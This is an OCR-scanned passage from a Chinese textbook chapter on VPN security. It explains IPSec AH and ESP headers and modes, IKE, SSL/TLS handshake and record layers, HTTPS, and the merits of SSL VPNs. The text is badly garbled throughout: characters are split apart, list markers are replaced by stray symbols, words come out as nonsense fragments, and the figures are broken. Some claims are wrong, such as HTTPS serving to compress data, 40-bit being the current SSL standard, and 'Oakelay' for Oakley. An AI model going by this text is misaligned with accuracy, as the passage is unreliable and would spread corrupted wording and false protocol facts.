认证 数据 ( 变 长 )(Authentication Data) 











(D 下 一 个 头 : 是 一 个 8 位 字段 ,识别 在 AH 头 后 下 一 个 载荷 的 类 型 。 在 传输 模式 下 ， 
将 是 载荷 中 受 保 护 的 上 层 协 议 的 值 , 例 如 UDP sk TCP 协议 的 值 。 在 隧道 模式 下 ,标识 
IPv4 封装 时 ,这 个 值 为 4, 表示 IP-in-IP(IPv4) 封 装 ; 标识 IPv6 封装 时 ,这 个 值 为 41, 表 示 
IP-in-IPCIPv6 ) 5j 3X , 

O 载荷 长 度 : 是 一 个 8 位 字段 ,标识 AH 报头 的 长 度 。 

© 预 留 字段 是 一 个 16 位 字段 。 

@ SPI 是 一 个 任意 32 位 的 值 , 和 外 部 IP 的 目的 地 址 一 起 用 于 识别 数据 报 的 安全 联盟 。 

C 序列 号 为 32 位 字段 ,不 允许 重复 ,唯一 地 标识 了 每 一 个 发 送 数据 包 ,为 安全 关联 提 
供 反 回 放 保护 。 接 收 端 校 验 序列 号 为 该 字段 值 的 数据 包 是 否 已 经 被 接收 过 ,若是 则 拒 收 该 
数据 包 。 

© 认证 数据 是 一 个 可 变 长 度 的 字段 ,32 位 的 整数 倍 ; 包含 完整 性 校 验 值 (ICV)。 接 收 
端 收 到 数据 包 后 ,首先 执行 Hash 计算 ,再 与 发 送 端 所 计算 的 该 字段 值 相 比 较 , 若 两 者 相等 
则 表示 数据 完整 ; 若 在 传输 过 程 中 数据 遭 修改 ,导致 两 个 计算 结果 不 一 致 , 则 丢弃 该 数据 包 。 

(2) AH 的 工作 模式 。AH 的 工作 模式 有 传输 模式 和 隧道 模式 两 种 。 原 始 IP 包 如 图 6-15 
所 示 。 





原始 IP 报头 TCP 数据 

















6-15 原始 IP 包 示意 图 


CD 传输 模式 : AH 使 用 原来 的 IP 报 头 , 把 AH dide IP 报头 的 后 面 ,如 图 6-16 所 示 。 





除了 可 变 字段 以 外 都 被 认证 
t ^ 


原始 IP 报 头 | AH | Tce 数据 


























图 6-16 AH 传输 模式 示意 图 


© 隧道 模式 : AH 把 需要 保护 的 IP 包 封装 在 新 的 IP 包 中 ,作为 新 报 文 的 载荷 ,然后 把 
AH 揪 在 新 的 IP 报头 的 后 面 ,如 图 6-17 所 示 。 











除了 新 IP 报 头 中 的 可 变 字段 以 外 都 被 认证 











^ 





新 IP 报 头 AH “| 原始 IP 报 洲 TCP 数据 























6-17 AH 隧道 模式 示意 图 


图 6-18 显示 了 两 种 使 用 IPSec 鉴别 服务 的 模式 。 一 种 是 在 服务 器 和 客户 机 之 间 直 接 
提供 鉴别 服务 ; 工作 站 可 以 与 服务 器 同 在 一 个 网 络 中 ,也 可 以 在 外 部 网 络 中 ; 只 要 工作 站 
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和 服务 器 共享 受 保护 的 密 钥 ,鉴别 处 理 就 是 安全 的 ,使 用 传输 模式 的 SA。 另 一 种 是 远程 工 
作 站 向 公司 的 防火 墙 鉴别 自己 的 身份 ,或 是 为 了 访问 整个 内 部 网 络 ,或 是 因为 请 求 的 服务 器 
不 支持 鉴别 特征 ,使 用 隧道 模式 的 SA。 











6-18 ”两 种 使 用 IPSec 鉴别 服务 的 模式 示意 图 


2) ESP 协议 

ESP 协议 为 IP 数据 包 提供 数据 的 保密 性 (加 密 ) 、 无 连接 的 数据 完整 性 ,数据 源 身份 认 
证 以 及 防 重 放 攻 击 保护 。 其 中 数据 保密 性 是 ESP 的 基本 功能 ,而 数据 源 身份 认证 、 数 据 完 
整 性 检验 以 及 重 放 保护 都 是 可 选 的 。ESP 本 身 是 一 个 IP 协议 ,协议 号 是 50。 

ESP 可 以 单独 使 用 ,也 可 以 和 AH 结合 使 用 。 一 般 ESP 不 对 整个 数据 包 加 密 , 而 是 只 
加 密 IP 包 的 有 效 载荷 部 分 ,不 包括 IP 头 。 但 在 端 到 端的 隧道 通信 中 ,ESP 需要 对 整个 数据 
包 加 密 。 

(D ESP 协议 头 格式 。ESP 协议 头 格 式 如 表 6-3 所 示 。 

表 6-3 ESP £ 
安全 参数 索引 (Security Parameters Index. SPD 
序列 号 (Sequence Number) 
载荷 数据 ( 变 长 )(Payload Data) 














填充 字段 (0 一 255B) 
填充 长 度 T—4X 














认证 数据 ( 变 长 ) (Authentication Data) 


(D SPI 是 32 位 的 必 选 字段 ,与 目标 地 址 和 协议 (ESP) 结 合 起 来 唯一 标识 处 理 数据 包 的 
特定 SA。 数 值 可 任 选 ,一 般 在 IKE 交换 过 程 中 由 目标 主机 选 定 。SPI 经 过 验证 ,但 是 不 
加 密 。 

© 序列 号 是 32 位 的 必 选 字段 ,是 一 个 单 向 递增 的 计数 器 。 对 序列 号 的 处 理由 接收 端 
确定 。 当 建立 一 个 SA 时 ,发 送 者 和 接收 者 的 序列 号 都 设置 为 0。 如果 使 用 抗 回放 服务 , 传 
送 的 序列 号 不 允许 循环 。 序 列 号 经 过 验证 ,但 是 不 加 密 。 

O 载荷 数据 是 变 长 的 必 选 字段 , 整 字 节 数 长 。 包 含有 下 一 个 报头 字段 描述 的 数据 。 加 
密 同 步 数据 ,可 能 包含 加 密 算 法 需要 的 初始 化 向 量 (IV),IV 是 没有 加 密 的 。 

© 由 于 加 密 算 法 可 能 要 求 整 数 倍 字 节 数 ,而 且 为 了 保证 认证 数据 字段 对 齐 以 及 隐藏 载 
荷 的 真实 长 度 ,实现 部 分 通信 流 保密 ,那么 就 需要 填充 项 。 填 充 内 容 内 指定 提供 机 密 性 的 加 
密 算 法 。 发 送 者 可 添加 0 一 255B。 
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O 填充 长 度 字段 是 一 个 必 选 字段 , 它 表示 填充 字段 的 长 度 ,合法 的 填充 长 度 是 0~255B， 
0 表示 没有 填充 。 

© 下 一 个 头 是 8bit 长 的 必 选 字段 ,表示 在 载荷 中 的 数据 类 型 。 信 道 模式 下 ,这 个 值 是 
4, 表 示 IP-in-IP; 传送 模式 下 是 载荷 数据 的 类 型 ,由 RFC 1700 定义 ,如 TCP 为 6。 

D 认证 数据 是 变 长 的 可 选 字段 ,只 有 SA 中 包含 了 认证 业务 时 才 包 含 这 个 字段 。 认 证 
算法 必须 指定 认证 数据 的 长 度 、 比 较 规则 和 验证 步 又。 

(2) ESP 的 工作 模式 。ESP 工作 方式 包括 传输 模式 和 隧道 模式 两 种 ,如 图 6-19 和 图 6-20 
所 示 。 它 们 的 差别 决定 了 ESP 保护 的 真正 对 象 是 什么 。 在 传输 模式 中 ,ESP 头 插 在 IP k 
和 IP 包 的 上 层 协议 之 间 ; 在 隧道 模式 下 ,整个 受 保护 的 IP 包 都 封装 在 一 个 ESP 头 中 ,还 增 
加 了 一 个 新 的 IP 3k. 






传输 模式 的 端 
到 端 会 话 加 密 























图 6-20 ESP 的 隧道 模式 示意 图 


图 6-19 显示 了 使 用 ESP 服务 的 传输 模式 ,图 6-20 显示 了 使 用 ESP 服务 的 隧道 模式 。 
图 6-19 直接 在 两 个 主机 之 间 提 供 加 密 (和 可 选 的 鉴别 ) 服 务 ,图 6-20 显示 了 怎样 使 用 隧道 
模式 来 建立 VPN。 

如 图 6-20 所 示 的 ESP 隧道 模式 ,一 个 组 织 有 4 个 专用 网 络 通过 Internet 连接 起 来 。 内 
部 网 络 上 的 主机 使 用 Internet 是 为 了 传输 数据 ,而 不 是 同 其 他 基于 Internet 的 主机 进行 交 
互 。 通 过 在 每 个 内 部 网 络 的 安全 网 关上 终止 隧道 ,允许 主机 避免 实现 安全 能 力 。 

前 一 种 技术 通过 传输 模式 SA 来 支持 ,而 后 一 种 技术 使 用 了 隧道 模式 SA. 

(3) ESP 传输 模式 。 传 输 模 式 的 ESP 用 于 对 IP 携带 的 数据 (如 TCP 报 文 段 ) 进 行 加 密 
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和 可 选 的 鉴别 ,如 图 6-21 所 示 。 对 于 使 用 IPv4 的 情况 ,ESP 报头 被 插 在 IP 包 中 紧 靠 传输 
层 报头 (如 TCP,UDP 和 ICMP) 之 前 的 位 置 ,而 ESP 尾部 (填充 、 填 充 长 度 和 下 一 个 报头 字 
段 ) 被 放置 在 IP 包 之 后 ; 如 果 选 择 了 鉴别 服务 , 则 ESP 鉴别 数据 字段 被 附加 在 ESP 尾部 之 
后 。 整 个 传输 级 报 文 段 加 上 ESP 尾部 被 加 密 , 鉴 别 覆 盖 了 所 有 的 密 文 与 ESP 报头 。 


被 鉴别 














被 加 密 











Fp 
Bumi, ESP 报头 | TCP | 数据 [ESP 尾部 ESP 鉴别 | 

















6-21 ESP 传输 模式 示意 图 


传输 模式 的 操作 可 以 总 结 如 下 。 

CD 在 源 站 ,由 ESP 尾部 加 上 整个 传输 级 的 报 文 段 组 成 的 数据 块 被 加 密 , 这 个 数据 块 的 
明文 被 其 密 文 所 代替 ,以 形成 用 于 传输 的 IP 包 。 如 果 ”* 鉴 别 ?选项 被 选中 ,还 要 加 上 鉴别 。 

@ 然后 包 被 路 由 到 目的 站 。 每 个 中 间 路 由 器 都 需要 检查 和 处 理 IP 报头 加 上 任何 明文 
的 IP 扩展 报头 ,但 是 不 需要 检查 密 文 。 

@ 目的 节点 检查 和 处 理 IP 报头 加 上 任何 明文 的 IP 扩展 报头 。 然 后 ,在 ESP 报头 的 
SPI 基础 上 目的 节点 对 包 的 其 他 部 分 进行 解密 以 恢复 明文 的 传输 层 报 文 段 。 

CD 传输 模式 操作 为 使 用 它 的 任何 应 用 程序 提供 了 机 密 性 ,因此 避免 了 在 每 一 个 单独 的 
应 用 程序 中 实现 机 密 性 ,这 种 模式 的 操作 也 是 相当 有 效 的 ,几乎 没有 增加 IP 包 的 总 长 度 。 
这 种 模式 的 一 个 缺陷 在 于 对 传输 的 包 进 行 通信 量 分 析 是 可 能 的 。 

(4) ESP 隧道 模式 。 隧 道 模式 的 ESP 用 于 对 整个 IP 包 进 行 加 密 , 如 图 6-22 所 示 。 在 
这 种 模式 下 ,在 包 的 前 面 加 上 ESP 头 , 然 后 对 包 加 上 ESP 的 尾部 进行 加 密 。 这 种 模式 可 以 
对 抗 通信 量 分 析 。 





被 鉴别 











被 加 密 




















La "$. 
[ip 报头 | ESp 报 头 | mueren. | rce | 数据 |EsP 尾 部 |EsP 鉴 别 














6-22 ESP 隧道 模式 示意 图 


因为 IP 报头 中 包含 了 目的 地 址 、 可 能 的 源 站 路 由 选择 指示 和 逐 跳 选项 信息 ,所 以 简单 
的 传输 前 面 附加 了 ESP 报头 加 密 的 IP 包 是 不 可 能 的 。 中 间 的 路 由 器 不 能 处 理 这 样 的 包 ， 
因此 用 一 个 新 的 IP 报头 来 包装 整个 块 ,这 个 新 的 IP 报头 将 包含 用 于 路 由 选择 的 足够 信息 ， 
但 不 能 进行 通信 量 的 分 析 。 

传输 模式 对 于 保护 两 个 支持 ESP 的 主机 之 间 的 连接 是 合适 的 ,而 隧道 模式 对 于 那些 包 
含 了 防火 墙 或 其 他 种 类 的 安全 网 关 的 配置 是 有 用 的 。 在 后 一 种 情况 下 ,加密 只 发 生 在 外 部 
主机 和 安全 网 关 之 间 或 者 两 个 安全 网 关 之 间 ,这 样 使 得 内 部 网 络 的 主机 解脱 了 处 理 加 密 的 
责任 ,并 且 通 过 减少 需要 密 钥 的 数量 而 简化 密 钥 分 配 的 任务 。 

考虑 这 样 一 种 情况 : 外 部 主机 想 要 与 被 防火 墙 保护 的 内 部 网 络 上 的 主机 进行 通信 ,并 
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且 在 外 部 主机 和 防火 墙 上 都 实现 了 ESP。 当 外 部 主机 向 内 部 主机 传输 传输 层 的 报 文 段 时 ， 
其 步骤 如 下 。 

CD 源 主机 准备 目的 地 址 是 目标 主机 的 内 部 IP 包 。 在 这 个 包 的 前 面 加 上 ESP 报头 , 然 
后 对 包 和 ESP 尾部 进行 加 密 并 且 可 能 增加 鉴别 数据 。 再 用 目的 地 址 是 防火 墙 的 新 的 TP 报 
头 对 结果 数据 块 进行 包装 ,这 样 形成 了 外 部 的 IP 包 。 

© 外 部 包 被 路 由 到 目的 防火 墙 。 每 个 中 间 路 由 器 都 要 检查 和 处 理 IP 报头 加 上 任何 外 
部 IP 扩展 报头 ,但 不 需要 检查 密 文 。 

@ 目的 防火 墙 检 查 和 处 理 外 部 IP 报头 加 上 任何 外 部 IP 扩展 报头 。 然 后 ,在 ESP 报头 
SPI 字 段 的 基础 上 ,目的 防火 墙 对 包 的 剩余 部 分 进行 解密 ,以 恢复 明文 的 内 部 IP 包 。 然 后 ， 
这 个 包 在 内 部 网 络 中 传输 。 

CD 内 部 包 在 内 部 网 络 中 经 过 零 个 或 多 个 路 由 器 到 达 了 目的 主机 。 

3) IKE 协议 

IKE 协议 在 IPSec 保护 一 个 包 之 前 ,需要 先 建立 一 个 SA。SA 可 以 手工 建立 ,也 可 以 自 
动 建立 。 当 用 户 数量 不 多 ,而 且 密 钥 的 更 新 频率 不 高 时 ,手工 建立 SA; 当 用 户 较 多 、 网 络 规 
模 较 大 时 ,自动 建立 SA。IKE 是 一 种 用 来 自动 管理 SA 的 协议 ,包括 建立 ,协商 ,修改 和 删 
除 SA 等 。 

IKE 包括 ISAKMP, .Oakelay 和 SKEME 这 3 个 协议 。ISAKMP 定义 了 包 格 式 、 重 发 
计数 器 以 及 消息 构建 要 求 , 定 义 了 整套 加 密 通 信和 语言 ; Oakelay 和 SKEME 定义 了 通信 双方 
建立 一 个 共享 的 验证 密 钥 所 必须 采取 的 步骤 。IKE 利用 ISAKMP 语言 对 这 些 步骤 以 及 其 
他 信息 交换 措施 进行 表述 。 

IKE 利用 ISAKMP 语言 来 定义 密 钥 交换 ,是 对 安全 服务 进行 协商 的 手段 。 最 终结 果 是 
一 个 通过 验证 的 密 钥 以 及 建立 在 双方 同意 基础 上 的 安全 服务 (IPSec SA). IKE 使 用 了 两 
个 阶段 的 ISAKMP。 第 一 阶段 建立 IKE 的 SA, 第 二 阶段 利用 这 个 既定 的 SA 为 IPSec D) 
商 具体 的 SA, 


6.4.6 SSL 协议 





一 项 最 新 的 研究 表明 , 近 90% 的 企业 利用 VPN 进行 的 内 部 网 和 外 部 网 的 连接 只 是 用 
来 进行 Web 访问 和 电子 邮件 通信 ,10% 的 用 户 利用 诸如 聊天 协议 和 私有 客户 端 应 用 。 而 这 
90% 的 应 用 可 以 利用 一 种 更 加 简单 、 成 本 更 低 的 VPN 技术 , 即 SSL. VPN 来 提供 更 加 有 效 
的 解决 方案 。 

1. SSL 的 概念 

SSL(Secure Sockets Layer, 安 全 套 接 层 协议 层 ) 是 一 种 在 Web 服务 协议 (HTTP) 和 
TCP/IP 之 间 提 供 数据 连接 安全 性 的 协议 。 它 为 TCP/IP 连接 提供 数据 加 密 、 用 户 和 服务 
器 身份 验证 以 及 消息 完整 性 验证 。SSL 被 视 为 因特网 上 Web 浏览 器 和 服务 器 的 安全 标准 。 

2. SSL VPN 的 功能 

SSL 安全 协议 主要 提供 3 方面 的 安全 服务 。 

CD 用 户 和 服务 器 的 合法 性 认证 。 认 证 用 户 和 服务 器 的 合法 性 ,使 得 它们 能 够 确信 数 
据 将 被 发 送 到 正确 的 客户 机 和 服务 器 上 。 客 户 机 和 服务 器 都 有 各 自 的 识别 号 ,这 些 识别 号 
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由 公开 密 钥 进行 编号 ,为 了 验证 用 户 是 否 合法 ,安全 套 接 层 协 议 要 求 在 握手 交换 数据 时 进行 
数字 认证 ,以 此 确保 用 户 的 合法 性 。 

(2) 加 密 数 据 以 隐藏 被 传送 的 数据 。SSL 所 采用 的 加 密 技术 既 有 对 称 密 钥 技 术 , 也 有 
公开 密 钥 技术 。 在 客户 机 与 服务 器 进行 数据 交换 之 前 ,交换 SSL 初始 握手 信息 ,在 SSL 握 
手 信息 中 采用 了 各 种 加 密 技术 对 其 加 密 , 以 保证 其 机 密 性 和 数据 完整 性 ,并 且 用 数字 证 书 进 
行 鉴别 ,这 样 可 以 防止 非法 用 户 破 译 。 

(3) 保护 数据 的 完整 性 。SSL 采用 哈 希 函数 和 机 密 共享 的 方法 提供 信息 的 完整 性 服 
务 , 建 立 客户 机 与 服务 器 之 间 的 安全 通道 ,所 有 经 过 SSL 处 理 的 业务 在 传输 过 程 中 完整 ME 
确 无 误 地 到 达 目 的 地 。 

3. SSL VPN 的 工作 机 制 

SSL 的 工作 包括 两 个 阶段 , 即 握手 和 数据 传输 。 在 握手 阶段 ,客户 端 和 服务 器 用 公 
加 密 算法 计算 出 私 钥 。 在 数据 传输 阶段 ,客户 端 和 服务 器 都 用 私 钥 来 加 密 和 解密 传输 过 来 
的 数据 。 

SSL 客户 端 在 TCP 连接 建立 之 后 ,发 出 一 个 Hello 消息 来 发 起 握手 ,这 个 消息 包括 了 
自己 可 实现 的 算法 列表 和 其 他 需要 的 消息 。SSL 的 服务 器 回应 一 个 类 似 Hello 的 消息 ,这 
里 面 确定 了 此 次 通信 所 需要 的 算法 ,然后 发 送 自己 的 证 书 。 客 户 端 在 收 到 这 个 消息 后 会 生 
成 一 个 消息 ,用 SSL 服务 器 的 公 钥 加 密 后 传送 过 去 ,SSL 服务 器 用 自己 的 私 钥 解密 后 ,会 话 
密 钥 协商 成 功 , 双 方 用 私 钥 算 法 来 进行 通信 。 

证 书 实质 上 是 表明 服务 器 身份 的 一 组 数据 ,一 般 第 三 方 作为 CA, 生 成 证 书 ,并 验证 它 
的 真实 性 。 为 获得 证 书 , 服 务 器 必须 用 安全 信道 向 CA 发 送 它 的 公 钥 。CA 生成 证 书 , 包 括 
它 自己 的 ID、 服 务 器 的 ID .服务 器 的 公 钥 和 其 他 信息 。 然 后 CA 利用 消息 摘要 算法 生成 证 
书 指纹 ,最 后 ,CA 用 私 钥 加 密 指纹 生成 证 书签 名 。 

为 证 明 服 务 器 的 证 书 合法 ,客户 端 首先 利用 CA 的 公 钥 解密 签名 读 取 指 纹 , 然 后 计算 服 
务 器 发 送 证 书 指纹 ,如 果 两 个 指纹 不 相符 ,说 明证 书 被 算 改 过 。 当 然 , 为 解密 签名 ,客户 端 必 
须 事先 可 靠 地 获得 CA 的 公 钥 。 客 户 端 保存 一 个 可 信赖 的 CA 和 它们 的 公 钥 清单 。 当 客户 
端 收 到 服务 器 的 证 书 时 ,要 验证 证 书 的 CA 在 它 所 保存 的 清单 之 列 。CA 的 数量 很 少 ,一 般 
通过 网 站 公布 它们 的 公 钥 。 很 多 浏览 器 把 主要 的 CA 的 公 钥 直接 编 入 到 它们 的 源 代码 中 。 
一 旦 服务 器 通过 了 客户 端的 鉴别 ,两 者 就 已 经 通过 公 钥 算法 确定 了 私 钥 信 息 。 当 两 边 均 表 
示 做 好 了 私 钥 通信 的 准备 后 ,用 完成 (Finished) 消 息 来 结束 握手 过 程 , 它 们 的 连接 进入 数据 
传输 阶段 。 在 数据 传输 过 程 中 ,两 端 都 将 发 送 的 消息 拆 分 成 片段 ,并 附 上 MAC( 散 列 值 )。 
传送 时 ,客户 端 和 服务 器 将 数据 片段 .MAC 和 记录 头 结合 起 来 并 用 密 钥 加 密 形 成 完整 的 
SSL 接收 时 ,客户 端 和 服务 器 解密 数据 包 , 计 算 MAC, 并 比较 计算 得 到 的 MAC 和 接收 到 
的 MAC。 

4. SSL 协议 

SSL(Secure Socket Layer) 目前 通用 规格 为 40 位 安全 标准 ,美国 已 推出 128 位 高 安全 
标准 。SSL 协议 位 于 TCP/IP 协议 与 各 种 应 用 层 协议 之 间 , 为 数据 通信 提供 安全 支持 。 
SSL 协议 可 分 为 两 层 : SSL 记录 协议 (SSL Record Protocol) , 它 建立 在 可 靠 的 传输 协议 (如 
TCP) 之 上 ,为 高 层 协 议 提 供 数据 封装 、 压 缩 、 加 密 等 基本 功能 的 支持 ; SSL 握手 协议 (SSL 
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Handshake Protocol) , 它 建立 在 SSL 记录 协议 之 上 ,用 于 在 实际 的 数据 传输 开始 前 ,通信 双 
方 进行 身份 认证 ,协商 加 密 算 法 ,交换 加 密 密 钥 等 。 

1) SSL 协议 的 工作 流程 

CD 服务 器 认证 阶段 。 

CD 客户 端 向 服务 器 发 送 一 个 开始 信息 Hello 以 便 开 始 一 个 新 的 会 话 连接 。 

@ 服务 器 根据 客户 的 信息 确定 是 否 需要 生成 新 的 主 密 钥 ,如 需要 则 服务 器 在 响应 客户 
的 “Hello” 信 息 时 将 包含 生成 主 密 钥 所 需 的 信息 。 

© 客户 根据 收 到 的 服务 器 响应 信息 ,产生 一 个 主 密 钥 ,并 用 服务 器 的 公开 密 钥 加 密 后 
传 给 服务 器 。 

CD 服务 器 恢复 该 主 密 钥 ,返回 给 客户 一 个 用 主 密 钥 认 证 的 信息 ,以 此 让 客户 认证 服务 器 。 

(2) 客户 认证 阶段 。 

在 此 之 前 ,服务 器 已 经 通过 了 客户 认证 ,这 一 阶段 主要 完成 对 客户 的 认证 ; 经 认证 的 服 
务 器 发 送 一 个 提问 给 客户 ,客户 则 返回 (数字 ) 签 名 后 的 提问 及 其 公开 密 钥 ,从 而 向 服务 器 提 
供认 证 。 

2) SSL 协议 结构 

SSL 协议 位 于 TCP/IP 协议 模型 的 网 络 层 和 应 用 层 之 间 ,使 用 TCP 来 提供 一 种 可 靠 的 
端 到 端的 安全 服务 , 它 使 客户 端 /服务 器 应 用 之 间 的 通信 不 被 攻击 者 窃听 ,并 且 始 终 对 服务 
器 进行 认证 ,还 可 以 选择 对 客户 进行 认证 。SSL 协议 在 应 用 层 通信 之 前 就 已 经 完成 加 密 算 
法 .通信 密 钥 的 协商 以 及 服务 器 认证 工作 ,在 此 之 后 ,应 用 层 协议 所 传送 的 数据 都 被 加 密 。 
SSL 实际 上 是 由 共同 工作 的 两 层 协议 组 成 ,如 表 6-4 所 示 。 从 中 可 以 看 出 SSL 安全 协议 实 
际 是 SSL 握手 协议 、SSL 修改 密 文 协议 .SSL 警告 协议 和 SSL 记录 协议 组 成 的 一 个 协议 族 。 

表 6-4 SSL 体系 结构 
握手 协议 修改 密 文 协议 报警 协议 
SSL 记录 协议 
ICP 
IP 











SSL 握手 协议 允许 通信 实体 在 交换 应 用 数据 之 前 协商 密 钥 的 算法 、 加 密 密 钥 和 对 客户 
端 进行 认证 (可 选 ) 的 协议 ,为 下 一 步 记录 协议 要 使 用 的 密 钥 信息 进行 协商 ,使 客户 端 和 服务 
器 建立 并 保持 安全 通信 的 状态 信息 。SSL 握手 协议 是 在 任何 应 用 程序 数据 传输 之 前 使 用 
的 。SSL 握手 协议 包含 4 个 阶段 : 第 一 个 阶段 建立 安全 能 力 ; 第 二 个 阶段 服务 器 鉴别 和 密 
钥 交 换 ; 第 三 个 阶段 客户 鉴别 和 密 钥 交换 ; 第 四 个 阶段 完成 握手 协议 ,如 图 6-23 所 示 。 

SSL 修改 密 文 协议 是 使 用 SSL 记录 协议 服务 的 SSL 高 层 协议 的 3 个 特定 协议 之 一 , 协 
议 由 单个 消息 组 成 ,该 消息 只 包含 一 个 值 为 1 的 单个 字 节 。 该 消息 的 唯一 作用 就 是 使 未 决 
状态 复制 为 当前 状态 ,更 新 用 于 当前 连接 的 口令 组 .为 了 保障 SSL 传输 过 程 的 安全 性 , 双 
方 应 该 每 隔 一 段 时 间 改 变 加 密 规范 。 

SSL 告警 协议 是 用 来 为 对 等 实体 传递 SSL 的 相关 警告 。 如 果 在 通信 过 程 中 某 一 方 发 
现 有 任何 异常 ,就 需要 给 对 方 发 送 一 条 警示 消息 通告 。 警 示 消 息 有 两 种 : 一 种 是 Fatal fif 
误 , 如 传递 数据 过 程 中 ,发 现 错误 的 MAC, 双 方 就 需要 立即 中 断 会 话 , 同 时 消除 自己 缓冲 区 
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客户 端 服务 器 


| 建立 安全 功能 ， 包 括 协议 版 本 、 

会 话 ID、 密 码 套件 、 压 缩 方 法 、 
-— 最 初 的 随机 数 

| I| 服务 器 可 以 发 送 证 书 、 密 钥 交 

sequest 换 和 证 书 请 求 ， 服 务 器 Hello 消 


certificate 1 息 阶段 结束 的 信息 











$ Certificate 
cli 客户 端 如 果 请 求 发 送 证 书 ， 客 
Sut key exchange 户 端 发 送 密 钥 交换 ， 客 户 端 可 
Certificate ver; 以 发 送 证 书 验证 





ci 


finish, 
np CRM 更 改 密码 套件 和 完成 握手 协议 


* spec 
change cipher Sp 











6-23 SSL 协议 4 个 工作 阶段 示意 图 


相应 的 会 话 记 录 ; 另 一 种 是 Warning 消息 ,这 种 情况 ,通信 双方 通常 都 只 是 记录 日 志 , 而 对 
通信 过 程 不 造成 任何 影响 。SSL 握手 协议 可 以 使 得 服务 器 和 客户 能 够 相互 鉴别 对 方 ,协商 
具体 的 加 密 算法 和 MAC 算法 以 及 保密 密 钥 ,用 来 保护 在 SSL 记录 中 发 送 的 数据 。 

SSL 记录 协议 为 SSL 连接 提供 了 两 种 服务 : 一 是 机 密 性 ; 二 是 完整 性 。 为 了 实现 这 两 
种 服务 ,SSL 记录 协议 对 接收 的 数据 和 被 接收 的 数据 工作 过 程 是 如 何 实现 的 呢 ? SSL 记录 
协议 接收 传输 的 应 用 报 文 , 将 数据 分 片 成 可 管理 的 块 , 进 行 数据 压缩 (可 选 ) ,应 用 MAC , 接 
着 利用 IDEA,DES,3DES 或 其 他 加 密 算法 进行 数据 加 密 , 最 后 增加 由 内 容 类 型 .主要 版 本 、 
次 要 版 本 和 压缩 长 度 组 成 的 首部 。 被 接收 的 数据 刚好 与 接收 数据 工作 过 程 相反 ,依次 被 解 
密 、 验 证 ,解压 缩 和 重新 装配 ,然后 交 给 更 高 级 用 户 。 

3) HTTPS 协议 

HTTPS 协议 用 于 对 数据 进行 压缩 和 解压 操作 ,并 返回 网 络 上 传送 回 的 结果 。HTTPS 
应 用 SSL 作为 HTTP 应 用 层 的 子 层 , 使 用 端口 443, SSL 使 用 40 位 关键 字 作 为 RCA 流 加 
密 算法 ; HTTPS 和 SSL 支持 使 用 x. 509 数字 认证 。HTTPS 是 以 安全 为 目标 的 HTTP 通 
道 , 即 HTTP 下 加 入 SSL J2. HTTPS 的 安全 基础 是 SSL ,因此 加 密 机 制 依托 于 SSL. 
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4) TLS 

TLS(Transport Layer Security, 传 输 层 安全 协议 ) 是 IETF 制定 的 一 种 新 的 协议 ,建立 
在 SSL 3.0 协议 规范 之 上 ,是 SSL 3.0 的 后 续 版 本 。 在 TLS 与 SSL 3. 0 之 间 存 在 着 显著 差 
别 , 主 要 是 它们 支持 的 加 密 算法 不 同 ,所 以 TLS 与 SSL 3.0 不 能 互 操作 。 

5. SSL VPN 的 主要 优点 和 不 足 

SSL VPN 相对 传统 的 技术 存在 一 些 优点 ,当然 不 足 之 处 通常 也 是 有 的 ,下 面 就 分 别 予 
以 介绍 。 

1) SSL VPN 的 主要 优点 

(1) 不 需要 安装 客户 端 软件 。 大 多 数 执行 基于 SSL 协议 的 远程 访问 不 需要 在 远程 客户 
端 设 备 上 安装 软件 ,只 需 通 过 标准 的 Web 浏览 器 连接 因特网 , 即 可 以 通过 网 页 访问 到 企业 
总 部 的 网 络 资源 。 

(2) 适用 于 大 多 数 设备 。 基 于 Web 访问 的 开放 体系 可 以 在 运行 标准 的 浏览 器 下 访问 
任何 设备 ,包括 非 传统 设备 ,如 可 以 上 网 的 电话 和 PDA 通信 产品 。 

(3) 适用 于 大 多 数 操作 系统 。 可 以 运行 标准 的 因特网 浏览 器 的 大 多 数 操作 系统 都 可 以 
用 来 进行 基于 Web 的 远程 访问 ,不 管 是 Windows .UNIX 还 是 Linux, 

(4) 支持 网 络 驱动 器 访问 。 用 户 通过 SSL VPN 通信 可 以 访问 在 网 络 驱动 器 上 的 资源 。 

(5) 良好 的 安全 性 。 用 户 通过 基于 SSL 的 Web 访问 并 不 是 网 络 的 真实 节点 ,就 像 
IPSec 安全 协议 一 样 ,而 且 还 可 代理 访问 公司 内 部 资源 。 因 此 ,这 种 方法 可 以 非常 安全 , 特 
别 是 对 于 外 部 用 户 的 访问 。 

(6) 较 强 的 资源 控制 能 力 。 基 于 Web 的 代理 访问 允许 公司 为 远程 访问 用 户 进 行 详尽 
的 资源 访问 控制 。 

CD) 减少 费用 。 为 那些 简单 远程 访问 用 户 ( 仅 需 进入 公司 内 部 网 站 或 者 进行 E-mail 通 
信 ) ,基于 SSL 的 VPN 网 络 可 以 非常 经 济 地 提供 远程 访问 服务 。 

(8) 可 以 绕 过 防火 墙 和 代理 服务 器 进行 访问 。 基 于 SSL 的 远程 访问 、 使 用 NAT 服务 
的 远程 用 户 或 者 因特网 代理 服务 的 用 户 可 以 绕 过 防火 墙 和 代理 服务 器 访问 公司 资源 ,而 基 
于 IPSec 的 远程 访问 是 做 不 到 的 。 

2) SSL VPN 的 主要 不 足 之 处 

CD 必须 依靠 因特网 进行 访问 。 通 过 基于 SSL VPN 的 远程 访问 ,必须 与 因特网 保持 连 
通 性 ; Web 浏览 器 实质 上 扮演 客户 端 /服务 器 的 角色 ,远程 用 户 的 Web 浏览 器 依靠 公司 的 
服务 器 进行 所 有 通信 o 

(2) 对 新 的 或 者 复杂 的 Web 技术 提供 有 限 支 持 。 基 于 SSL 的 VPN 是 依赖 反 代 理 技术 
来 访问 公司 网 络 的 。 远 程 用 户 从 公用 因特网 来 访问 公司 网 络 , 而 公司 内 部 网 络 信息 处 于 防 
火 墙 后 面 , 而 且 处 于 没有 内 部 网 IP 地 址 路 由 表 的 空间 中 。 反 代理 的 工作 就 是 翻译 出 远程 用 
P! Web 浏览 器 的 需求 ,SSL 很 难 支 持 。 

O 只 能 有 限 地 支持 Windows 应 用 或 者 其 他 非 Web 系统 ,因为 大 多 数 基于 SSL 的 
VPN 都 是 基 Web 浏览 器 工作 的 ,远程 用 户 不 能 在 Windows, UNIX, Linux, AS400 或 者 大 
型 系统 上 进行 非 基 于 Web 界面 的 应 用 。 

© 只 能 为 访问 资源 提供 有 限 的 安全 保障 ,基于 SSL 的 Web 浏览 器 进行 VPN 通信 时 ， 
